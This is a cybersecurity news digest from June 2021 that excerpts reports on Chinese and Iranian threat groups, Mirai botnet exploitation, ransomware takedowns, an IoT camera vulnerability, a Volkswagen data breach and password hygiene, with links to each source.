OSN June 16, 2021

Fortify Security Team
Jun 16, 2021

Title: Threat Activity Group RedFoxtrot Linked to China’s PLA Unit 69010; Targets Bordering Asian Countries
Date Published: June 16, 2021

https://www.recordedfuture.com/redfoxtrot-china-pla-targets-bordering-asian-countries/

Excerpt: “Recorded Future’s Insikt Group has identified ties between a suspected Chinese state-sponsored threat activity group we track as RedFoxtrot and the Chinese military intelligence apparatus, specifically People’s Liberation Army (PLA) Unit 69010 located in Ürümqi, Xinjiang. This activity offers a glimpse into PLA operations following a major organizational restructure beginning in 2015 and follows a period where public reporting has largely concentrated on groups affiliated with China’s Ministry of State Security (MSS).”

Title: Ferocious Kitten: 6 Years of Covert Surveillance in Iran
Date Published: June 16, 2021

https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

Excerpt: “Additionally, such groups are known to target various platforms (most notably Windows and Android) and often share TTPs, as indicated in this report. The latter in particular may suggest that the underlying actors may be interconnected, sharing developers or operating under a mutual supervisor. While not technically impressive, it’s interesting that the actor created specialized variants to be launched alongside popular programs, namely Chrome and Telegram.”

Title: AT&T Report: Malware Hosting Domain Cyberium Fanning out Mirai Variants
Date Published: June 14, 2021

https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants

Excerpt: “During the end of March, AT&T Alien Labs observed a spike in exploitation attempts for Tenda Remote Code Execution (RCE) vulnerability CVE-2020-10987. This spike was observed throughout a significant number of clients, in the space of a few hours. This vulnerability is not commonly used by web scanners and was barely detected by our honeypots during the last six months, except for a minor peak in November. This exploit can be identified by the URL that is requested, which includes ‘setUsbUnload’ with the payload assigned to the vulnerable parameter ‘deviceName’. This payload contains the logic to change the execution path to a temporary location, wget a file from a malware hosting page, provide execution permissions, and execute it.”

Title: Avaddon Ransomware Gang Evaporates Amid Global Crackdowns  
Date Published: June 16, 2021

https://threatpost.com/avaddon-ransomware-global-crackdowns/166968/

Excerpt: “Avaddon was believed to be operating within the Commonwealth of Independent States (former Soviet-bloc countries), meaning the group’s shutdown just happens to coincide with President Biden’s summit with Russian President Vladimir Putin, where officials said ransomware and cybersecurity will be discussed. Avaddon launched one of these punitive DDoS attacks against Australian-based telecom provider Schepisi Communication when it refused to pay up.”

Title: Ukraine Arrests Clop Ransomware Gang Members, Seizes Servers
Date Published: June 16, 2021

https://www.bleepingcomputer.com/news/security/ukraine-arrests-clop-ransomware-gang-members-seizes-servers/

Excerpt: “According to the Cyberpolice Department of the National Police of Ukraine the ransomware group is behind total financial damages of roughly $500 million. Based on Ukrainian police’s press release, it is not yet clear if the arrested individuals are affiliates or core members of the ransomware operation. Based on Ukrainian police’s press release, it is not yet clear if the arrested individuals are affiliates or core members of the ransomware operation. Clop’s Tor payment site and data leak site are still operational, so it looks like the Clop ransomware operation has not been completely shut down at this time.”

Title: Critical ThroughTek Flaw Opens Millions of Connected Cameras to Eavesdropping
Date Published: June 16, 2021

https://thehackernews.com/2021/06/critical-throughtek-flaw-opens-millions.html

Excerpt: “Successful exploitation of this vulnerability could permit unauthorized access to sensitive information, such as camera audio/video feeds,” CISA said in the alert. ThroughTek’s point-to-point (P2P) SDK is widely used by IoT devices with video surveillance or audio/video transmission capability such as IP cameras, baby and pet monitoring cameras, smart home appliances, and sensors to provide remote access to the media content over the internet.”

Title: Volkswagen, Audi Notify 3.3 Million of Data Breach
Date Published: June 15, 2021

https://www.bankinfosecurity.com/volkswagen-audi-notify-33-million-data-breach-a-16875

Excerpt: “More sensitive data, however, was leaked for 90,000 individuals in the United States. Volkswagen says the driver’s license numbers for most of those people were leaked. A smaller number within that group may have also had their birth dates, Social Security or social insurance numbers, account or loan numbers and tax identification numbers leaked, Volkswagen says. Affected individuals are being notified by either email or postal mail. Free credit protection services are being offered for anyone whose driver’s license number or other more sensitive data was exposed.”

Title: The First Step: Initial Access Leads to Ransomware
Date Published: June 16, 2021

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

Excerpt: “TA577 is a prolific cybercrime threat actor tracked by Proofpoint since mid-2020. This actor conducts broad targeting across various industries and geographies, and Proofpoint has observed TA577 deliver payloads including Qbot, IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike. Proofpoint assesses with high confidence TA577 is associated with a March 2021 Sodinokibi ransomware infection. TA577 initially compromised the victim via emails containing malicious Microsoft Office attachments, which, when macros are enabled, download and run IcedID. Activity observed by this actor increased 225% in the last six months.”

Title: Football Fever Puts Password Security at Risk
Date Published: June 16, 2021

infosecurity-magazine.com/news/football-fever-password-security/  

Excerpt: “It claimed that of the one billion passwords in the trove, over 1.1 million are linked to the beautiful game. These are led by the password “football” (353,993), followed by “Liverpool” (215,842), “Chelsea” (172,727), “Arsenal” (151,936) and “Barcelona” (131,090). The problem for these users is two-fold: not only are such credentials relatively easy to guess or crack, but if they’re reused across multiple accounts, including corporate ones, it could expose them to credential stuffing.”

Title: Will “Data Poisoning” Be a Particularly Dangerous Type of Computer-Made Misinformation?
Date Published: June 16, 2021

https://medium.com/deepnews-ai/will-data-poisoning-be-a-particularly-dangerous-type-of-computer-made-misinformation-50a1fb7a7993

Excerpt: “It turns out that current methods of generating fake news with a machine, even using a model that pre-dates recent advances like GPT-3, Google’s LaMDA or Wu Dao in China, are good enough to fool cybersecurity analysts who had worked in the field for years. They were able to identify only around 21% of the fake reports as fake, worse than chance. The researchers said that this batch of correctly identified fake reports also happened to be the ones that had more “linguistic deficiencies” than the ones that analysts thought were true.”

Recent Posts

OSN August 31, 2021

Title: Cyberattacks Use Office 365 to Target Supply Chain Date Published: August 31, 2021 https://securityintelligence.com/articles/cyberattacks-office-365-supply-chain/ Excerpt: “Supply chain cyberattacks involving Office 365 are effective in that they enable threat...

OSN August 30, 2021

Title: New Mirai Variant Targets WebSVN Command Injection Vulnerability (CVE-2021-32305) Date Published: August 30, 2021 https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/ Excerpt: “Analysis of this malware reveals that it is used to perform distributed denial...

OSN August 27, 2021

Title: Microsoft Azure Vulnerability Exposed Thousands of Cloud Databases Date Published: August 27, 2021 https://www.cyberscoop.com/microsoft-azure-cloud-vulnerability/ Excerpt: “The flaw would have allowed any Azure Cosmos DB user to read, write and delete another...

OSN August 26, 2021

Title: Microsoft Breaks Silence on Barrage of ProxyShell Attacks Date Published: August 26, 2021 https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/ Excerpt: “The company released an advisory late Wednesday letting customers know that threat actors may...

OSN August 26, 2021

Title: Microsoft Breaks Silence on Barrage of ProxyShell Attacks Date Published: August 26, 2021 https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/ Excerpt: “The company released an advisory late Wednesday letting customers know that threat actors may...

OSN August 25, 2021

Title: Fake Opensea Support Staff Are Stealing Cryptowallets and NFTS Date Published: August 24, 2021 https://www.bleepingcomputer.com/news/security/fake-opensea-support-staff-are-stealing-cryptowallets-and-nfts/ Excerpt: “When an OpenSea user needs support, they can...

OSN August 24, 2021

Title: A Phishing Attack Exposes Medical Information for 12,000 Patients at Revere Health Date Published: August 23, 2021 https://www.thespectrum.com/story/news/2021/08/23/phishing-attack-exposes-information-12-000-patients-st-george/8214230002/ Excerpt: “A healthcare...